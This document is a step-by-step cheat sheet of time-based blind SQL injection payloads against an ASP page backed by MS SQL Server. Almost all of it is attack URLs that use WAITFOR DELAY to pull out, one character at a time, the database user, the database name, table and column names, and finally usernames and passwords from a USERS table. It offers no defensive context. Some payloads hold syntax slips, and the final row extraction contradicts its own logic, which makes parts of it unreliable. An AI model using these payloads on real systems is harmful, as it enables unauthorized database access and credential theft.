
BLIND SQL INJECTION - DETECTION
 
Integer Injection:
http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)

String Injection:
http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)


BLIND SQL INJECTION - EXTRACT DATABASE USER
   
3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)


D - 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
 
B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)

 
O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Database User = DBO

BLIND SQL INJECTION - EXTRACT DATABASE NAME
   
http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),7,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Database Name = PRO-DB-1

BLIND SQL INJECTION - EXTRACT 1st  DATABASE TABLE
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Table Name = USERS

BLIND SQL INJECTION - EXTRACT 2nd DATABASE TABLE
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS')=6) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),1,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),2,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),3,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),4,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),5,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),6,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Table Name = ORDERS

BLIND SQL INJECTION - EXTRACT 3rd DATABASE TABLE
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS')=9) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),1,1)))=99) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),2,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),3,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),4,1)))=116) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),5,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),6,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),7,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),8,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),9,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Table Name = CUSTOMERS

BLIND SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS')=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Column Name = USER

BLIND SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER')=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),1,1)))=112) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),2,1)))=97) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),3,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),4,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Column Name = PASS

BLIND SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>,'PASS')=2) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'PASS'),1,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'PASS'),2,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Column Name = ID

BLIND SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS)=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),1,1))=97) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),2,1))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),3,1))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),4,1))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),5,1))=110) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Field Data = ADMIN

BLIND SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from USERS)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),1,1))=49) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),2,1))=50) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),3,1))=51) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Field Data = 123

BLIND SQL INJECTION - EXTRACT 3rd FIELD OF 1st ROW
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 ID  from USERS)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),1,1))=49) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),2,1))=48) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),3,1))=48) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Field Data = 100

BLIND SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USERS desc)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),2,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Field Data = JOE

BLIND SQL INJECTION - EXTRACT 1st FIELD OF 3rd ROW
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USERS desc)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),2,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),3,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Field Data = JIM

